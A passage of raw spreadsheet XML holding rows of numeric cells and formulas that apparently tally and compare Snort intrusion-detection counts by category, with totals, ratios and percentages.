        <v>38</v>
      </c>
      <c r="AC18" s="170">
        <v>38.0</v>
      </c>
      <c r="AD18" s="169"/>
      <c r="AE18" s="168" t="s">
        <v>284</v>
      </c>
      <c r="AF18" s="171">
        <f t="shared" ref="AF18:AI18" si="9">Y18/$V18</f>
        <v>0.1818181818</v>
      </c>
      <c r="AG18" s="171">
        <f t="shared" si="9"/>
        <v>0.4545454545</v>
      </c>
      <c r="AH18" s="171">
        <f t="shared" si="9"/>
        <v>0.7272727273</v>
      </c>
      <c r="AI18" s="172">
        <f t="shared" si="9"/>
        <v>3.454545455</v>
      </c>
      <c r="AJ18" s="169"/>
      <c r="AK18" s="169"/>
      <c r="AL18" s="169"/>
      <c r="AM18" s="169"/>
      <c r="AN18" s="169"/>
      <c r="AO18" s="169"/>
      <c r="AP18" s="169"/>
      <c r="AQ18" s="169"/>
      <c r="AR18" s="169"/>
      <c r="AS18" s="169"/>
    </row>
    <row r="19">
      <c r="C19" s="167"/>
      <c r="D19" s="167"/>
      <c r="E19" s="167"/>
      <c r="F19" s="167"/>
      <c r="G19" s="167"/>
      <c r="H19" s="167"/>
      <c r="I19" s="167"/>
      <c r="J19" s="168" t="s">
        <v>903</v>
      </c>
      <c r="K19" s="169">
        <v>2.0</v>
      </c>
      <c r="L19" s="169">
        <v>2.0</v>
      </c>
      <c r="M19" s="169">
        <v>2.0</v>
      </c>
      <c r="N19" s="169">
        <v>2.0</v>
      </c>
      <c r="O19" s="170">
        <v>4.0</v>
      </c>
      <c r="Q19" s="168" t="s">
        <v>903</v>
      </c>
      <c r="R19" s="169">
        <v>2.0</v>
      </c>
      <c r="S19" s="169">
        <v>2.0</v>
      </c>
      <c r="T19" s="169">
        <v>3.0</v>
      </c>
      <c r="U19" s="169">
        <v>3.0</v>
      </c>
      <c r="V19" s="170">
        <v>6.0</v>
      </c>
      <c r="X19" s="168" t="s">
        <v>903</v>
      </c>
      <c r="Y19" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N104:N109)</f>
        <v>2</v>
      </c>
      <c r="Z19" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R104:R109)</f>
        <v>6</v>
      </c>
      <c r="AA19" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V104:V109)</f>
        <v>14</v>
      </c>
      <c r="AB19" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z104:Z109)</f>
        <v>32</v>
      </c>
      <c r="AC19" s="170">
        <v>32.0</v>
      </c>
      <c r="AD19" s="169"/>
      <c r="AE19" s="168" t="s">
        <v>903</v>
      </c>
      <c r="AF19" s="171">
        <f t="shared" ref="AF19:AI19" si="10">Y19/$V19</f>
        <v>0.3333333333</v>
      </c>
      <c r="AG19" s="171">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AH19" s="171">
        <f t="shared" si="10"/>
        <v>2.333333333</v>
      </c>
      <c r="AI19" s="172">
        <f t="shared" si="10"/>
        <v>5.333333333</v>
      </c>
      <c r="AJ19" s="169"/>
      <c r="AK19" s="169"/>
      <c r="AL19" s="169"/>
      <c r="AM19" s="169"/>
      <c r="AN19" s="169"/>
      <c r="AO19" s="169"/>
      <c r="AP19" s="169"/>
      <c r="AQ19" s="169"/>
      <c r="AR19" s="169"/>
      <c r="AS19" s="169"/>
    </row>
    <row r="20">
      <c r="C20" s="167"/>
      <c r="D20" s="167"/>
      <c r="E20" s="167"/>
      <c r="F20" s="167"/>
      <c r="G20" s="167"/>
      <c r="H20" s="167"/>
      <c r="I20" s="167"/>
      <c r="J20" s="168" t="s">
        <v>373</v>
      </c>
      <c r="K20" s="169">
        <v>1.0</v>
      </c>
      <c r="L20" s="169">
        <v>1.0</v>
      </c>
      <c r="M20" s="169">
        <v>1.0</v>
      </c>
      <c r="N20" s="169">
        <v>1.0</v>
      </c>
      <c r="O20" s="170">
        <v>5.0</v>
      </c>
      <c r="Q20" s="168" t="s">
        <v>373</v>
      </c>
      <c r="R20" s="169">
        <v>1.0</v>
      </c>
      <c r="S20" s="169">
        <v>2.0</v>
      </c>
      <c r="T20" s="169">
        <v>2.0</v>
      </c>
      <c r="U20" s="169">
        <v>2.0</v>
      </c>
      <c r="V20" s="170">
        <v>11.0</v>
      </c>
      <c r="X20" s="168" t="s">
        <v>373</v>
      </c>
      <c r="Y20" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N110:N116)+SUM('(B) - Detecciones - Snort'!N39:N42)</f>
        <v>9</v>
      </c>
      <c r="Z20" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R110:R116)+SUM('(B) - Detecciones - Snort'!R39:R42)</f>
        <v>140</v>
      </c>
      <c r="AA20" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V110:V116)+SUM('(B) - Detecciones - Snort'!V39:V42)</f>
        <v>148</v>
      </c>
      <c r="AB20" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z110:Z116)+SUM('(B) - Detecciones - Snort'!Z39:Z42)</f>
        <v>391</v>
      </c>
      <c r="AC20" s="170">
        <v>391.0</v>
      </c>
      <c r="AD20" s="169"/>
      <c r="AE20" s="168" t="s">
        <v>373</v>
      </c>
      <c r="AF20" s="171">
        <f t="shared" ref="AF20:AI20" si="11">Y20/$V20</f>
        <v>0.8181818182</v>
      </c>
      <c r="AG20" s="171">
        <f t="shared" si="11"/>
        <v>12.72727273</v>
      </c>
      <c r="AH20" s="171">
        <f t="shared" si="11"/>
        <v>13.45454545</v>
      </c>
      <c r="AI20" s="172">
        <f t="shared" si="11"/>
        <v>35.54545455</v>
      </c>
      <c r="AJ20" s="169"/>
      <c r="AK20" s="169"/>
      <c r="AL20" s="169"/>
      <c r="AM20" s="169"/>
      <c r="AN20" s="169"/>
      <c r="AO20" s="169"/>
      <c r="AP20" s="169"/>
      <c r="AQ20" s="169"/>
      <c r="AR20" s="169"/>
      <c r="AS20" s="169"/>
    </row>
    <row r="21">
      <c r="C21" s="167"/>
      <c r="D21" s="167"/>
      <c r="E21" s="167"/>
      <c r="F21" s="167"/>
      <c r="G21" s="167"/>
      <c r="H21" s="167"/>
      <c r="I21" s="167"/>
      <c r="J21" s="168" t="s">
        <v>1008</v>
      </c>
      <c r="K21" s="169">
        <v>1.0</v>
      </c>
      <c r="L21" s="169">
        <v>1.0</v>
      </c>
      <c r="M21" s="169">
        <v>1.0</v>
      </c>
      <c r="N21" s="169">
        <v>1.0</v>
      </c>
      <c r="O21" s="170">
        <v>8.0</v>
      </c>
      <c r="Q21" s="168" t="s">
        <v>1008</v>
      </c>
      <c r="R21" s="169">
        <v>1.0</v>
      </c>
      <c r="S21" s="169">
        <v>1.0</v>
      </c>
      <c r="T21" s="169">
        <v>1.0</v>
      </c>
      <c r="U21" s="169">
        <v>2.0</v>
      </c>
      <c r="V21" s="170">
        <v>8.0</v>
      </c>
      <c r="X21" s="168" t="s">
        <v>1008</v>
      </c>
      <c r="Y21" s="169">
        <f>SUM('(B) - Detecciones - Snort'!N117:N125)</f>
        <v>3</v>
      </c>
      <c r="Z21" s="169">
        <f>SUM('(B) - Detecciones - Snort'!R117:R125)</f>
        <v>10</v>
      </c>
      <c r="AA21" s="169">
        <f>SUM('(B) - Detecciones - Snort'!V117:V125)</f>
        <v>13</v>
      </c>
      <c r="AB21" s="169">
        <f>SUM('(B) - Detecciones - Snort'!Z117:Z125)</f>
        <v>35</v>
      </c>
      <c r="AC21" s="170">
        <v>35.0</v>
      </c>
      <c r="AD21" s="169"/>
      <c r="AE21" s="168" t="s">
        <v>1008</v>
      </c>
      <c r="AF21" s="171">
        <f t="shared" ref="AF21:AI21" si="12">Y21/$V21</f>
        <v>0.375</v>
      </c>
      <c r="AG21" s="171">
        <f t="shared" si="12"/>
        <v>1.25</v>
      </c>
      <c r="AH21" s="171">
        <f t="shared" si="12"/>
        <v>1.625</v>
      </c>
      <c r="AI21" s="172">
        <f t="shared" si="12"/>
        <v>4.375</v>
      </c>
      <c r="AJ21" s="169"/>
      <c r="AK21" s="169"/>
      <c r="AL21" s="169"/>
      <c r="AM21" s="169"/>
      <c r="AN21" s="169"/>
      <c r="AO21" s="169"/>
      <c r="AP21" s="169"/>
      <c r="AQ21" s="169"/>
      <c r="AR21" s="169"/>
      <c r="AS21" s="169"/>
    </row>
    <row r="22">
      <c r="C22" s="167"/>
      <c r="D22" s="167"/>
      <c r="E22" s="167"/>
      <c r="F22" s="167"/>
      <c r="G22" s="167"/>
      <c r="H22" s="167"/>
      <c r="I22" s="167"/>
      <c r="J22" s="173" t="s">
        <v>1095</v>
      </c>
      <c r="K22" s="174">
        <v>1.0</v>
      </c>
      <c r="L22" s="174">
        <v>2.0</v>
      </c>
      <c r="M22" s="174">
        <v>2.0</v>
      </c>
      <c r="N22" s="174">
        <v>2.0</v>
      </c>
      <c r="O22" s="175">
        <v>4.0</v>
      </c>
      <c r="Q22" s="173" t="s">
        <v>1095</v>
      </c>
      <c r="R22" s="174">
        <v>1.0</v>
      </c>
      <c r="S22" s="174">
        <v>2.0</v>
      </c>
      <c r="T22" s="174">
        <v>2.0</v>
      </c>
      <c r="U22" s="174">
        <v>2.0</v>
      </c>
      <c r="V22" s="175">
        <v>4.0</v>
      </c>
      <c r="X22" s="173" t="s">
        <v>1095</v>
      </c>
      <c r="Y22" s="174">
        <f>SUM('(B) - Detecciones - Snort'!N126:N129)</f>
        <v>2</v>
      </c>
      <c r="Z22" s="174">
        <f>SUM('(B) - Detecciones - Snort'!R126:R129)</f>
        <v>6</v>
      </c>
      <c r="AA22" s="174">
        <f>SUM('(B) - Detecciones - Snort'!V126:V129)</f>
        <v>10</v>
      </c>
      <c r="AB22" s="174">
        <f>SUM('(B) - Detecciones - Snort'!Z126:Z129)</f>
        <v>23</v>
      </c>
      <c r="AC22" s="175">
        <v>23.0</v>
      </c>
      <c r="AD22" s="169"/>
      <c r="AE22" s="173" t="s">
        <v>1095</v>
      </c>
      <c r="AF22" s="176">
        <f t="shared" ref="AF22:AI22" si="13">Y22/$V22</f>
        <v>0.5</v>
      </c>
      <c r="AG22" s="176">
        <f t="shared" si="13"/>
        <v>1.5</v>
      </c>
      <c r="AH22" s="176">
        <f t="shared" si="13"/>
        <v>2.5</v>
      </c>
      <c r="AI22" s="177">
        <f t="shared" si="13"/>
        <v>5.75</v>
      </c>
      <c r="AJ22" s="169"/>
      <c r="AK22" s="169"/>
      <c r="AL22" s="169"/>
      <c r="AM22" s="169"/>
      <c r="AN22" s="169"/>
      <c r="AO22" s="169"/>
      <c r="AP22" s="169"/>
      <c r="AQ22" s="169"/>
      <c r="AR22" s="169"/>
      <c r="AS22" s="169"/>
    </row>
    <row r="23">
      <c r="C23" s="178"/>
      <c r="D23" s="178"/>
      <c r="E23" s="178"/>
      <c r="F23" s="178"/>
      <c r="G23" s="178"/>
      <c r="H23" s="178"/>
      <c r="I23" s="178"/>
      <c r="J23" s="178"/>
      <c r="K23" s="178"/>
      <c r="L23" s="178"/>
      <c r="M23" s="178"/>
      <c r="N23" s="178"/>
      <c r="O23" s="178"/>
    </row>
    <row r="24">
      <c r="C24" s="178"/>
      <c r="D24" s="178"/>
      <c r="E24" s="178"/>
      <c r="F24" s="178"/>
      <c r="G24" s="178"/>
      <c r="H24" s="178"/>
      <c r="I24" s="178"/>
      <c r="J24" s="178"/>
      <c r="K24" s="178"/>
      <c r="L24" s="178"/>
      <c r="M24" s="178"/>
      <c r="N24" s="178"/>
      <c r="O24" s="179" t="s">
        <v>1193</v>
      </c>
      <c r="Q24" s="178"/>
      <c r="R24" s="178"/>
      <c r="S24" s="178"/>
      <c r="T24" s="178"/>
      <c r="U24" s="178"/>
      <c r="V24" s="179" t="s">
        <v>1193</v>
      </c>
      <c r="AC24" s="179" t="s">
        <v>1193</v>
      </c>
    </row>
    <row r="25">
      <c r="C25" s="180"/>
      <c r="D25" s="180"/>
      <c r="E25" s="180"/>
      <c r="F25" s="180"/>
      <c r="G25" s="180"/>
      <c r="H25" s="180"/>
      <c r="I25" s="180"/>
      <c r="J25" s="180" t="s">
        <v>1207</v>
      </c>
      <c r="K25" s="181">
        <f t="shared" ref="K25:O25" si="14">SUM(K10:K22)</f>
        <v>8</v>
      </c>
      <c r="L25" s="181">
        <f t="shared" si="14"/>
        <v>14</v>
      </c>
      <c r="M25" s="181">
        <f t="shared" si="14"/>
        <v>19</v>
      </c>
      <c r="N25" s="181">
        <f t="shared" si="14"/>
        <v>23</v>
      </c>
      <c r="O25" s="169">
        <f t="shared" si="14"/>
        <v>79</v>
      </c>
      <c r="Q25" s="180" t="s">
        <v>1208</v>
      </c>
      <c r="R25" s="163">
        <f t="shared" ref="R25:V25" si="15">SUM(R10:R22)</f>
        <v>8</v>
      </c>
      <c r="S25" s="163">
        <f t="shared" si="15"/>
        <v>16</v>
      </c>
      <c r="T25" s="163">
        <f t="shared" si="15"/>
        <v>26</v>
      </c>
      <c r="U25" s="163">
        <f t="shared" si="15"/>
        <v>32</v>
      </c>
      <c r="V25" s="169">
        <f t="shared" si="15"/>
        <v>129</v>
      </c>
      <c r="X25" s="180" t="s">
        <v>1209</v>
      </c>
      <c r="Y25" s="182">
        <f t="shared" ref="Y25:AC25" si="16">SUM(Y10:Y22)</f>
        <v>127</v>
      </c>
      <c r="Z25" s="182">
        <f t="shared" si="16"/>
        <v>357</v>
      </c>
      <c r="AA25" s="182">
        <f t="shared" si="16"/>
        <v>431</v>
      </c>
      <c r="AB25" s="182">
        <f t="shared" si="16"/>
        <v>1054</v>
      </c>
      <c r="AC25" s="182">
        <f t="shared" si="16"/>
        <v>1054</v>
      </c>
    </row>
    <row r="26">
      <c r="C26" s="180"/>
      <c r="D26" s="180"/>
      <c r="E26" s="180"/>
      <c r="F26" s="180"/>
      <c r="G26" s="180"/>
      <c r="H26" s="180"/>
      <c r="I26" s="180"/>
      <c r="J26" s="180" t="s">
        <v>1210</v>
      </c>
      <c r="K26" s="178">
        <f t="shared" ref="K26:N26" si="17">$O$25-K25</f>
        <v>71</v>
      </c>
      <c r="L26" s="178">
        <f t="shared" si="17"/>
        <v>65</v>
      </c>
      <c r="M26" s="178">
        <f t="shared" si="17"/>
        <v>60</v>
      </c>
      <c r="N26" s="178">
        <f t="shared" si="17"/>
        <v>56</v>
      </c>
      <c r="Q26" s="180" t="s">
        <v>1211</v>
      </c>
      <c r="R26" s="183">
        <f t="shared" ref="R26:U26" si="18">$O$25-R25</f>
        <v>71</v>
      </c>
      <c r="S26" s="183">
        <f t="shared" si="18"/>
        <v>63</v>
      </c>
      <c r="T26" s="183">
        <f t="shared" si="18"/>
        <v>53</v>
      </c>
      <c r="U26" s="183">
        <f t="shared" si="18"/>
        <v>47</v>
      </c>
      <c r="V26" s="182"/>
      <c r="X26" s="180" t="s">
        <v>1212</v>
      </c>
      <c r="Y26" s="184">
        <f t="shared" ref="Y26:AB26" si="19">Y25/$AC$25</f>
        <v>0.1204933586</v>
      </c>
      <c r="Z26" s="184">
        <f t="shared" si="19"/>
        <v>0.3387096774</v>
      </c>
      <c r="AA26" s="184">
        <f t="shared" si="19"/>
        <v>0.4089184061</v>
      </c>
      <c r="AB26" s="184">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="AC26" s="182"/>
    </row>
    <row r="27">
      <c r="C27" s="180"/>
      <c r="D27" s="180"/>
      <c r="E27" s="180"/>
      <c r="F27" s="180"/>
      <c r="G27" s="180"/>
      <c r="H27" s="180"/>
      <c r="I27" s="180"/>
      <c r="J27" s="180" t="s">
        <v>1213</v>
      </c>
      <c r="K27" s="185">
        <f t="shared" ref="K27:N27" si="20">K25/(K25+K26)</f>
        <v>0.1012658228</v>
      </c>
      <c r="L27" s="185">
        <f t="shared" si="20"/>
        <v>0.1772151899</v>
      </c>
      <c r="M27" s="185">
        <f t="shared" si="20"/>
        <v>0.2405063291</v>
      </c>
      <c r="N27" s="185">
        <f t="shared" si="20"/>
        <v>0.2911392405</v>
      </c>
      <c r="Q27" s="180" t="s">
        <v>1214</v>
      </c>
      <c r="R27" s="184">
        <f t="shared" ref="R27:U27" si="21">R25/(R25+R26)</f>
        <v>0.1012658228</v>
      </c>
      <c r="S27" s="184">
        <f t="shared" si="21"/>
        <v>0.2025316456</v>
      </c>
      <c r="T27" s="184">
        <f t="shared" si="21"/>
        <v>0.3291139241</v>
      </c>
      <c r="U27" s="184">
        <f t="shared" si="21"/>
        <v>0.4050632911</v>
      </c>
      <c r="V27" s="182"/>
      <c r="Y27" s="182"/>
      <c r="Z27" s="182"/>
      <c r="AA27" s="182"/>
      <c r="AB27" s="182"/>
      <c r="AC27" s="182"/>
    </row>
    <row r="28">
      <c r="C28" s="180"/>
      <c r="D28" s="180"/>
      <c r="E28" s="180"/>
      <c r="F28" s="180"/>
      <c r="G28" s="180"/>
      <c r="H28" s="180"/>
      <c r="I28" s="180"/>
      <c r="J28" s="180" t="s">
        <v>1215</v>
      </c>
      <c r="K28" s="185">
        <f t="shared" ref="K28:N28" si="22">1-K27</f>
        <v>0.8987341772</v>
      </c>
      <c r="L28" s="185">
        <f t="shared" si="22"/>
        <v>0.8227848101</v>
      </c>
      <c r="M28" s="185">
        <f t="shared" si="22"/>
        <v>0.7594936709</v>
      </c>
      <c r="N28" s="185">
        <f t="shared" si="22"/>
        <v>0.7088607595</v>
      </c>
      <c r="Q28" s="180" t="s">
        <v>1216</v>
      </c>
      <c r="R28" s="184">
        <f t="shared" ref="R28:U28" si="23">1-R27</f>
        <v>0.8987341772</v>
      </c>
      <c r="S28" s="184">
        <f t="shared" si="23"/>
        <v>0.7974683544</v>
      </c>
      <c r="T28" s="184">
        <f t="shared" si="23"/>
        <v>0.6708860759</v>
      </c>
      <c r="U28" s="184">
        <f t="shared" si="23"/>
        <v>0.5949367089</v>
      </c>
      <c r="V28" s="182"/>
    </row>
    <row r="29">
      <c r="R29" s="182"/>
      <c r="S29" s="182"/>
      <c r="T29" s="182"/>
      <c r="U29" s="182"/>
      <c r="V29" s="182"/>
    </row>
    <row r="30">
      <c r="X30" s="186" t="s">
        <v>1217</v>
      </c>
      <c r="Y30" s="113"/>
      <c r="Z30" s="113"/>
      <c r="AA30" s="113"/>
      <c r="AB30" s="113"/>
      <c r="AC30" s="114"/>
      <c r="AE30" s="186" t="s">
        <v>1218</v>
      </c>
      <c r="AF30" s="113"/>
      <c r="AG30" s="113"/>
      <c r="AH30" s="113"/>
      <c r="AI30" s="114"/>
    </row>
    <row r="31">
      <c r="X31" s="160" t="s">
        <v>1203</v>
      </c>
      <c r="Y31" s="161" t="s">
        <v>4</v>
      </c>
      <c r="Z31" s="161" t="s">
        <v>5</v>
      </c>
      <c r="AA31" s="161" t="s">
        <v>6</v>
      </c>
      <c r="AB31" s="161" t="s">
        <v>7</v>
      </c>
      <c r="AC31" s="162" t="s">
        <v>1219</v>
      </c>
      <c r="AE31" s="160" t="s">
        <v>1203</v>
      </c>
      <c r="AF31" s="161" t="s">
        <v>4</v>
      </c>
      <c r="AG31" s="161" t="s">
        <v>5</v>
      </c>
      <c r="AH31" s="161" t="s">
        <v>6</v>
      </c>
      <c r="AI31" s="162" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="32">
      <c r="X32" s="168" t="s">
        <v>46</v>
      </c>
      <c r="Y32" s="169">
        <v>1.0</v>
      </c>
      <c r="Z32" s="169">
        <v>10.0</v>
      </c>
      <c r="AA32" s="169">
        <v>67.0</v>
      </c>
      <c r="AB32" s="169">
        <v>85.0</v>
      </c>
      <c r="AC32" s="170">
        <v>85.0</v>
      </c>
      <c r="AE32" s="168" t="s">
        <v>46</v>
      </c>
      <c r="AF32" s="187">
        <f t="shared" ref="AF32:AI32" si="24">Y32/Y10</f>
        <v>0.02173913043</v>
      </c>
      <c r="AG32" s="187">
        <f t="shared" si="24"/>
        <v>0.1369863014</v>
      </c>
      <c r="AH32" s="187">
        <f t="shared" si="24"/>
        <v>0.7701149425</v>
      </c>
      <c r="AI32" s="188">
        <f t="shared" si="24"/>
        <v>0.7142857143</v>
      </c>
    </row>
    <row r="33">
      <c r="X33" s="168" t="s">
        <v>119</v>
      </c>
      <c r="Y33" s="169">
        <v>0.0</v>
      </c>
      <c r="Z33" s="169">
        <v>0.0</v>
      </c>
      <c r="AA33" s="169">
        <v>0.0</v>
      </c>
      <c r="AB33" s="169">
        <v>0.0</v>
      </c>
      <c r="AC33" s="170">
        <v>0.0</v>
      </c>
      <c r="AE33" s="168" t="s">
        <v>119</v>
      </c>
      <c r="AF33" s="187">
        <f t="shared" ref="AF33:AI33" si="25">Y33/Y11</f>
        <v>0</v>
      </c>
      <c r="AG33" s="187">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="AH33" s="187">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="AI33" s="188">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="34">
      <c r="X34" s="168" t="s">
        <v>171</v>
      </c>
      <c r="Y34" s="169">
        <v>1.0</v>
      </c>
      <c r="Z34" s="169">
        <v>7.0</v>
      </c>
      <c r="AA34" s="169">
        <v>10.0</v>
      </c>
      <c r="AB34" s="169">
        <v>10.0</v>
      </c>
      <c r="AC34" s="170">
        <v>10.0</v>
      </c>
      <c r="AE34" s="168" t="s">
        <v>171</v>
      </c>
      <c r="AF34" s="187">
        <f t="shared" ref="AF34:AI34" si="26">Y34/Y12</f>
        <v>0.1666666667</v>
      </c>
      <c r="AG34" s="187">
        <f t="shared" si="26"/>
        <v>0.5384615385</v>
      </c>
      <c r="AH34" s="187">
        <f t="shared" si="26"/>
        <v>0.4761904762</v>
      </c>
      <c r="AI34" s="188">
        <f t="shared" si="26"/>
        <v>0.1694915254</v>
      </c>
    </row>
    <row r="35">
      <c r="X35" s="168" t="s">
        <v>172</v>
      </c>
      <c r="Y35" s="169">
        <v>0.0</v>
      </c>
      <c r="Z35" s="169">
        <v>2.0</v>
      </c>
      <c r="AA35" s="169">
        <v>7.0</v>
      </c>
      <c r="AB35" s="169">
        <v>7.0</v>
      </c>
      <c r="AC35" s="170">
        <v>7.0</v>
      </c>
      <c r="AE35" s="168" t="s">
        <v>172</v>
      </c>
      <c r="AF35" s="187">
        <f t="shared" ref="AF35:AI35" si="27">Y35/Y13</f>
        <v>0</v>
      </c>
      <c r="AG35" s="187">
        <f t="shared" si="27"/>
        <v>0.3333333333</v>
      </c>
      <c r="AH35" s="187">
        <f t="shared" si="27"/>
        <v>0.5</v>
      </c>
      <c r="AI35" s="188">
        <f t="shared" si="27"/>
        <v>0.1891891892</v>
      </c>
    </row>
    <row r="36">
      <c r="X36" s="168" t="s">
        <v>330</v>
      </c>
      <c r="Y36" s="169">
        <v>0.0</v>
      </c>
      <c r="Z36" s="169">
        <v>0.0</v>
      </c>
      <c r="AA36" s="169">
        <v>3.0</v>
      </c>
      <c r="AB36" s="169">
        <v>4.0</v>
      </c>
      <c r="AC36" s="170">
        <v>4.0</v>
      </c>
      <c r="AE36" s="168" t="s">
        <v>330</v>
      </c>
      <c r="AF36" s="187" t="s">
        <v>10</v>
      </c>
      <c r="AG36" s="187">
        <f t="shared" ref="AG36:AI36" si="28">Z36/Z14</f>
        <v>0</v>
      </c>
      <c r="AH36" s="187">
        <f t="shared" si="28"/>
        <v>0.3333333333</v>
      </c>
      <c r="AI36" s="188">
        <f t="shared" si="28"/>
        <v>0.09302325581</v>
      </c>
    </row>
    <row r="37">
      <c r="X37" s="168" t="s">
        <v>397</v>
      </c>
      <c r="Y37" s="169">
        <v>2.0</v>
      </c>
      <c r="Z37" s="169">
        <v>3.0</v>
      </c>
      <c r="AA37" s="169">
        <v>4.0</v>
      </c>
      <c r="AB37" s="169">
        <v>7.0</v>
      </c>
      <c r="AC37" s="170">
        <v>7.0</v>
      </c>
      <c r="AE37" s="168" t="s">
        <v>397</v>
      </c>
      <c r="AF37" s="187">
        <f t="shared" ref="AF37:AI37" si="29">Y37/Y15</f>
        <v>1</v>
      </c>
      <c r="AG37" s="187">
        <f t="shared" si="29"/>
        <v>0.4285714286</v>
      </c>
      <c r="AH37" s="187">
        <f t="shared" si="29"/>
        <v>0.4444444444</v>
      </c>
      <c r="AI37" s="188">
        <f t="shared" si="29"/>
        <v>0.1458333333</v>
      </c>
    </row>
    <row r="38">
      <c r="X38" s="168" t="s">
        <v>509</v>
      </c>
      <c r="Y38" s="169">
        <v>0.0</v>
      </c>
      <c r="Z38" s="169">
        <v>2.0</v>
      </c>
      <c r="AA38" s="169">
        <v>3.0</v>
      </c>
      <c r="AB38" s="169">
        <v>4.0</v>
      </c>
      <c r="AC38" s="170">
        <v>4.0</v>
      </c>
      <c r="AE38" s="168" t="s">
        <v>509</v>
      </c>
      <c r="AF38" s="187">
        <f t="shared" ref="AF38:AI38" si="30">Y38/Y16</f>
        <v>0</v>
      </c>
      <c r="AG38" s="187">
        <f t="shared" si="30"/>
        <v>0.1666666667</v>
      </c>
      <c r="AH38" s="187">
        <f t="shared" si="30"/>
        <v>0.2</v>
      </c>
      <c r="AI38" s="188">
        <f t="shared" si="30"/>
        <v>0.04819277108</v>
      </c>
    </row>
    <row r="39">
      <c r="X39" s="168" t="s">
        <v>244</v>
      </c>
      <c r="Y39" s="169">
        <v>0.0</v>
      </c>
      <c r="Z39" s="169">
        <v>3.0</v>
      </c>
      <c r="AA39" s="169">
        <v>4.0</v>
      </c>
      <c r="AB39" s="169">
        <v>5.0</v>
      </c>
      <c r="AC39" s="170">
        <v>5.0</v>
      </c>
      <c r="AE39" s="168" t="s">
        <v>244</v>
      </c>
      <c r="AF39" s="187">
        <f t="shared" ref="AF39:AI39" si="31">Y39/Y17</f>
        <v>0</v>
      </c>
      <c r="AG39" s="187">
        <f t="shared" si="31"/>
        <v>0.2</v>
      </c>
      <c r="AH39" s="187">
        <f t="shared" si="31"/>
        <v>0.2222222222</v>
      </c>
      <c r="AI39" s="188">
        <f t="shared" si="31"/>
        <v>0.07575757576</v>
      </c>
    </row>
    <row r="40">
      <c r="X40" s="168" t="s">
        <v>284</v>
      </c>
      <c r="Y40" s="169">
        <v>0.0</v>
      </c>
      <c r="Z40" s="169">
        <v>0.0</v>
      </c>
      <c r="AA40" s="169">
        <v>1.0</v>
      </c>
      <c r="AB40" s="169">
        <v>1.0</v>
      </c>
      <c r="AC40" s="170">
        <v>1.0</v>
      </c>
      <c r="AE40" s="168" t="s">
        <v>284</v>
      </c>
      <c r="AF40" s="187">
        <f t="shared" ref="AF40:AI40" si="32">Y40/Y18</f>
        <v>0</v>
      </c>
      <c r="AG40" s="187">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="AH40" s="187">
        <f t="shared" si="32"/>
        <v>0.125</v>
      </c>
      <c r="AI40" s="188">
        <f t="shared" si="32"/>
        <v>0.02631578947</v>
      </c>
    </row>
    <row r="41">
      <c r="X41" s="168" t="s">
        <v>903</v>
      </c>
      <c r="Y41" s="169">
        <v>2.0</v>
      </c>
      <c r="Z41" s="169">
        <v>6.0</v>
      </c>
      <c r="AA41" s="169">
        <v>13.0</v>
      </c>
      <c r="AB41" s="169">
        <v>13.0</v>
      </c>
      <c r="AC41" s="170">
        <v>13.0</v>
      </c>
      <c r="AE41" s="168" t="s">
        <v>903</v>
      </c>
      <c r="AF41" s="187">
        <f t="shared" ref="AF41:AI41" si="33">Y41/Y19</f>
        <v>1</v>
      </c>
      <c r="AG41" s="187">
        <f t="shared" si="33"/>
        <v>1</v>
      </c>
      <c r="AH41" s="187">
        <f t="shared" si="33"/>
        <v>0.9285714286</v>
      </c>
      <c r="AI41" s="188">
        <f t="shared" si="33"/>
        <v>0.40625</v>
      </c>
    </row>
    <row r="42">
      <c r="X42" s="168" t="s">
        <v>373</v>
      </c>
      <c r="Y42" s="169">
        <v>1.0</v>
      </c>
      <c r="Z42" s="169">
        <v>3.0</v>
      </c>
      <c r="AA42" s="169">
        <v>13.0</v>
      </c>
      <c r="AB42" s="169">
        <v>15.0</v>
      </c>
      <c r="AC42" s="170">
        <v>15.0</v>
      </c>
      <c r="AE42" s="168" t="s">
        <v>373</v>
      </c>
      <c r="AF42" s="187">
        <f t="shared" ref="AF42:AI42" si="34">Y42/Y20</f>
        <v>0.1111111111</v>
      </c>
      <c r="AG42" s="187">
        <f t="shared" si="34"/>
        <v>0.02142857143</v>
      </c>
      <c r="AH42" s="187">
        <f t="shared" si="34"/>
        <v>0.08783783784</v>
      </c>
      <c r="AI42" s="188">
        <f t="shared" si="34"/>
        <v>0.03836317136</v>
      </c>
    </row>
    <row r="43">
      <c r="X43" s="168" t="s">
        <v>1008</v>
      </c>
      <c r="Y43" s="169">
        <v>1.0</v>
      </c>
      <c r="Z43" s="169">
        <v>1.0</v>
      </c>
      <c r="AA43" s="169">
        <v>1.0</v>
      </c>
      <c r="AB43" s="169">
        <v>3.0</v>
      </c>
      <c r="AC43" s="170">
        <v>3.0</v>
      </c>
      <c r="AE43" s="168" t="s">
        <v>1008</v>
      </c>
      <c r="AF43" s="187">
        <f t="shared" ref="AF43:AI43" si="35">Y43/Y21</f>
        <v>0.3333333333</v>
      </c>
      <c r="AG43" s="187">
        <f t="shared" si="35"/>
        <v>0.1</v>
      </c>
      <c r="AH43" s="187">
        <f t="shared" si="35"/>
        <v>0.07692307692</v>
      </c>
      <c r="AI43" s="188">
        <f t="shared" si="35"/>
        <v>0.08571428571</v>
      </c>
    </row>
    <row r="44">
      <c r="X44" s="173" t="s">
        <v>1095</v>
      </c>
      <c r="Y44" s="174">
        <v>1.0</v>
      </c>
      <c r="Z44" s="174">
        <v>3.0</v>
      </c>
      <c r="AA44" s="174">
        <v>4.0</v>
      </c>
      <c r="AB44" s="174">
        <v>4.0</v>
      </c>
      <c r="AC44" s="175">
        <v>4.0</v>
      </c>
      <c r="AE44" s="173" t="s">
        <v>1095</v>
